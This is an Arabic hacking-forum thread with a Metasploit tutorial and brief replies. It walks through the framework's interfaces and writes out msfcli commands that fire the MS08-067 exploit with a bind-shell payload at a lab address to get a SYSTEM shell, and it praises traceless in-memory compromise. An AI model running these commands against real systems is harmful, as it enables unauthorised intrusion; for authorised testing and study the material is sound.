طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )


صفحة 1 من 12 12311 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 116

الموضوع: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

  1. #1
    :: مشرف عام :: Aljyyosh Team الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    Hasri طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )



    مرحبا بكم ياأعضاء منتديات جيوش الهكر ، راح نتناول في هذا الموضوع طرق الإستخدام المتقدم لمشروع الميتاسبلويت ،فكما تعلمون أننا نستطيع استخدام مشروع ميتاسبلويت في فحص الشبكات والأجهزة الموجودة فيها ويمكننا اختراقها بشكل أوتوماتيكي باستخدام أداة خطيرة موجودة ضمن المشروع تدعى db_autopwn؟ والمشروع قادر على اعطائنا نتائج دقيقة جدا في عملية الـ Penetration Testing لأننا في مشروع ميتاسبلويت نتأكد ان كان الضعف الأمني Vulnerability قابل للاستغلال Exploitable أم لا بعكس برامج فحص الثغرات الأخرى التي غالبا تعطينا نتائج غير دقيقة وأحياناً خاطئة لأنها تعتمد على المعلومات التي حصلت عليها فقط دون القدرة على التأكد من صحتها! هل تعلم أن المشروع يحتوي على استغلالات متقدمة جدا تصل للقدرة على التحكم بسطح مكتب الجهاز الذي قمنا باختراقه والقدرة على التحكم الكامل بالجهاز مع عدم ظهور أي شيء يدعو مدير الشبكة للشك بأن الجهاز مخترق لأن الاستغلال لن يقوم بتشغيل أي برنامج قد تظهر بقائمة المهام أو يترك آثار في الجهاز بل سيقوم بحقن مكتبات dll في الذاكرة مباشرة مستغلا الثغرة الموجودة في البرنامج! هل تعلم أننا نستطيع استخدام المشروع في أمور مفيدة كأن نجعل استغلال الثغرة يقوم بتنصيب ترقيع أمني بشكل تلقائي عوضاً عن اختراق الجهاز؟!! وهل تعلم أننا نستطيع استعمال المكتبات التي بني عليها ويستخدمها المشروع بعمله في برمجة أدوات فعّالة وكتابة استغلال لثغرات Remote Buffer Overflow بكل سرعة وسهولة؟!


    منذ انتقال المشروع للاصدار الثالث واعادة برمجته من جديد بلغة روبي عوضا عن بيرل تم جعله ليكون قابل للتطوير بشكل كبير وليكون بيئة شاملة يستخدمها أي Hacker أو Penetration Tester في عمله ومن اطلع على هيكلة المشروع وطريقة برمجته لفهم تماما ماذا أقصد فالمشروع يعتمد بعمله على تخزين كل شيء في قواعد بيانات ويحتوي على نظام تسجيل Log مدمج يمكننا استخدامه على 3 مستويات كذلك يمكننا برمجة اضافات Plugins للمشروع حتى نجعله يعمل بالطريقة التي تناسبنا أضف الى ذلك امكانية برمجة Modules خاصة واضافتها للمشروع ان كان هذا الـ Module ثغرة, Shellcode, Encoder أو حتى أداة مساعدة Auxiliary نستخدمها في عملنا.


    تم تنفيذ الشرح على نظام GNU/Linux توزيعة Fedora باستخدام الاصدار 3.2 من مشروع ****sploit والاصدار 1.8.6-p111 من مفسّر لغة Ruby (بعض الاصدارات الأحدث من مفسّر لغة روبي مثل 1.8.7 تتعارض مع مشروع ميتاسبلويت مما يؤدي لعدم عمله بالشكل الصحيح, بهذه الحالة علينا عمل Downgrade وحذف الاصدار المنصّب في التوزيعة و تحميل الاصدار 1.8.6 ثم تنصيبه على الجهاز بعد بناءة من المصدر.)

    مشروع ****sploit يتطلّب اعداد بيئة مناسبة لتشغله واستخدام اضافاته لذلك تأكد من وجود الحزم التالية منصّبة في التوزيعة التي تستخدمها:


    كود:
    ruby ruby-irb ruby-libs ruby-rdoc ruby-devel readline rubygems rubygem-rails ruby-gtk2
    ruby-libglade2 subversion sqlite3 rubygem-sqlite3-ruby
    [hide]وبعد تحميل المشروع وتنصيبه من الأفضل تحديثه لآخر اصدار باستخدام الأمر[/hide]:


    كود:
    svn update framework-3.2
    استبدل framework-3.2 باسم/مسار مجلد المشروع أو قم بالدخول للمجلد من سطر الأوامر ونفذ الأمر:


    كود:
    svn update
    التعامل مع المشروع باستخدام الواجهات المرفقة



    يأتي مشروع ****sploit بعدة واجهات تمكننا من استخدام المشروع بالطريقة التي تناسبنا فاذا اطلعنا على مجلد المشروع سنشاهد التالي:





    msfconsole: [hide]سطر أوامر مشروع ميتاسبلويت ويمكننا اعتباره الواجهة الرئيسية للمشروع, يوفر لنا سطر أوامر المشروع تحكم كامل في ميتاسبلويت, الثغرات وجميع الأدوات الموجودة بالمشروع ونستطيع من خلاله الوصول لجميع البرامج الموجودة في الجهاز كما أنه يحتوي على نفس خصائص سطر أوامر نظام لينوكس مثل دعم الاكمال التلقائي بالضغط على زر Tab ويمكننا عند استخدامه تحديد المتغيرات التي نريدها مسبقا لنتمكن من استغلال الثغرات بشكل سريع والعديد من الأمور الأخرى (شخصيا أجد أن سطر الأوامر هو الطريقة الأنسب للتعامل مع المشروع وستلاحظون ذلك أثناء استخدامه في الشرح)[/hide].





    ****sploit-2

    msfcli: واجهة أخرى تعمل من سطر الأوامر لكنها تختلف عن msfconsole بأنها ليست تفاعلية (Interactive) أي أننا لن نحتاج للدخول الى سطر أوامر المشروع وتنفيذ عدة أوامر لاستغلال الثغرة بل نستطيع القيام بذلك بتنفيذ أمر واحد فقط بعد تحديد الخيارات التي نريدها بشكل صحيح وهذا يفيدنا في استخدام المشروع من خلال Bash Script أو أي برنامج آخر, نفذ الأمر:


    كود:
    ./msfcli
    لاستعراض الخيارات التي يوفرها msfcli ولاستعراض جميع الثغرات/الأدوات المساعدة الموجودة في مشروع ميتاسبلويت كما هو ظاهر في الصورة التالية:



    ****sploit-3

    حسنا كون msfcli ليست واجهة غير تفعالية هذا يعني أننا نستطيع التعامل مع المشروع واستغلال الثغرات باستخدام أمر واحد فقط! كذلك يمكننا استخدامها مع برامج أخرى, لنفرض أننا نريد استغلال الثغرة MS08-67 في البداية نتأكد من وجودها في المشروع باستخدام الأمر:


    كود:
    ./msfcli | grep "ms08_067"
    ليظهر لنا اسم الثغرة التي نريد استغلالها “exploit/windows/smb/ms08_067_netapi” ننفذ الأمر:


    كود:
    ./msfcli exploit/windows/smb/ms08_067_netapi S
    ليتم عرض معلومات عن الثغرة كما هو واضح في الصورة التالية:



    لاظهار خيارات الثغرة, نستخدم الأمر:


    كود:
    ./msfcli exploit/windows/smb/ms08_067_netapi O

    أما لاظهار الخيارات المتقدمة نستخدم الأمر:


    كود:
    ./msfcli exploit/windows/smb/ms08_067_netapi A
    بالنسبة لي سأبقي الخيارات الافتراضية كما هي مع تحديد قيمة RHOST فقط وأنفذ الأمر:


    كود:
    ./msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.2.128 P
    لاستعراض الـ Payloads التي توفرها هذه الثغرة:



    لنفرض أننا اخترنا أبسط استغلال “windows/shell/bind_tcp” ونريد اختراق الجهاز 192.168.2.128 اذا كل ما علينا هو تنفيذ الأمر:


    كود:
    ./msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.2.128
    PAYLOAD=windows/shell/bind_tcp O
    لاظهار خيارات الاستغلال كما هو واضح في الصورة التالية:



    بالنسبة لي سأغير المنفذ الافتراضي الذي سيتم فتحه بالجهاز الى 2222 لذلك نحدد قيمة LPORT ولا ننسى تحديد RHOST مرة أخرى أيضا ليصبح الاستغلال النهائي بهذا الشكل:


    كود:
    ./msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/shell/bind_tcp
    RHOST=192.168.2.128 LPORT=2222 E
    لاحظ أننا أضفنا الى نهاية الأمر E ليتم تشغيل الاستغلال:



    كما تلاحظون تمكّنا من اختراق الجهاز والحصول على remote Shell بصلاحيات SYSTEM بتنفيذ أمر واحد فقط!!! << مين فيكم يستخدم ويندوز؟ ومن مازال يعيش في عصر عنترة بن شداد ويفكر بالاختراق باستخدام باتش أو استغلال ثغرة في IE!!؟

    msfgui: الواجهة الرسومية من مشروع ميتاسبلويت, تمت برمجتها باستخدام مكتبة GTK ولغة Ruby لذلك احتجنا لوجود الحزم ruby-gtk2 , ruby-libglade2 منصبة في التوزيعة التي نستخدمها, نستطيع عن طريق هذه الواجهة عمل كل شيء والتحكم الكامل في المشروع فهي تحتوي على سطر أوامر المشروع مدمج بداخلها كما أنها تقوم بتصنيف الثغرات والـ Modules الموجودة في المشروع بطريقة جميلة وبسيطة وكل ماعلينا هو النقر مرتين على الثغرة التي نريد لتظهر لنا نافذة تطلب منا الخيارات لتنفيذ الثغرة, كما تحتوي الواجهة على نافذتين الأولى تظهر لنا الثغرات التي تعمل Jobs والأخرى تظهر لنا الاستغلالات الناجحة التي حصلنا عليها Sessions, يتم تشغيلها بتنفيذ الأمر:


    كود:
    ./msfgui
    msfweb: هذه الواجهة تعمل عن طريق المتصفح بالاعتماد على مشروع Ruby On Rails وتعتبر هذه الواجهة الأساسية في نظام ويندوز, يمكننا تشغيل msfweb باستخدام الأمر:


    كود:
    ./msfweb
    بعد ذلك كل ماعلينا هو فتح المتصفح على الرابط:


    كود:
    http://127.0.0.1:55555
    لتظهر لنا الواجهة كما هو واضح في الصور التالية:



    يجب علينا الحذر عند استخدام هذه الواجهة داخل الشبكة لأنها لا تحتوي على نظام تسجيل [hide]دخول أو أي نظام حماية مما يمكن الأشخاص الموجودين في الشبكة من استخدام المشروع وهذا قد يعرض جهازك للاختراق! اذا أردت استخدام هذه الواجهة يجب اعداد الجدار الناري بطريقة صحيحة لتمنع الآخرين من الاتصال بجهازك عن طريق المنفذ[/hide] 55555.

    msfd: تقوم بتشغيل مشروع ****sploit كخدمة في الجهاز وتمكننا من استخدامه عن بعد باستخدام الأداة Netcat أو Telnet مثلا, الجميل في msfd أنها تمكن أكثر من شخص من استخدام نفس المشروع كما أنها تسمح لهم بمشاركة العمليات والـ Sessions فيما بينهم. نفّذ الأمر:


    كود:
    ./msfd -h
    لاستعراض الخيارات:



    نستخدم a لتحديد أيبي الجهاز الذي ستعمل عليه الخدمة ونستخدم p لتحديد المنفذ الذي نريد عوضا عن المنفذ الافتراضي 55554, مثلا:


    كود:
    ./msfd -a 192.168.2.1 -p 55442
    [hide]الآن أي شخص يستطيع استخدام مشروع ميتاسبلويت عن بعد باستخدام أداة[/hide] Netcat أو Telent وذلك بتنفيذ الأمر:


    كود:
    nc 192.168.2.1 55442
    [hide]لاحظ أن هذه الخدمة أيضا لاتحتوي على نظام حماية أو تسجيل دخول وهذا يمكن أي شخص موجود داخل الشبكة من الاتصال بالجهاز الذي يعمل عليه[/hide] msfd والتحكم بالجهاز بشكل كامل!


    إلى هنا نكون انهينا الجزء الأول بفضل الله ، وتابعونا في الجزء الثاني ان شاء الله حيث سنتناول الإستغلالات المتقدمة في مشروع الميتاسبلويت


    ودمتم سالمين
    التعديل الأخير تم بواسطة BLACK.JaGuAr ; 12-21-2009 الساعة 05:40 PM

    I love Yemen




  2. #2

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

    بصراحة لا أستطيع التعليق على مدى إعجابي بمواضيعك وأسلوبك.
    شرح واضح وكافي ومرفق بالصور والاهم من ذلك أنها حصرية على منتدانا فقط
    يعني بصراحة... كل الإحترام
    واصل وتقبل تحياتي
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  3. #3

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

    فعلاااا استفدت

  4. #4

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

    السلام عليكم ورحمة الله وركاته

  5. #5

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

    شكراُ جزيلاً

  6. #6

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

    شكراُ جزيلاً

  7. #7

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

    مشكوووووووووووووووووووووو ووووووووورررررررررررررررر ررر

  8. #8

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

    شكراااااااااااا

  9. #9

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

    شكراااااااااا

  10. #10

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )

    تسلم على الشرح الرائع

صفحة 1 من 12 12311 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. الاختراق المتقدم (m-e-t-a-s-p-l-o-i-t)
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 39
    آخر مشاركة: 03-05-2013, 08:53 PM
  2. التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 10
    آخر مشاركة: 10-02-2012, 10:38 PM
  3. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 2 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 28
    آخر مشاركة: 10-02-2012, 10:03 PM
  4. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 14
    آخر مشاركة: 11-24-2011, 04:34 PM
  5. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 3 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 16
    آخر مشاركة: 11-24-2011, 03:49 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •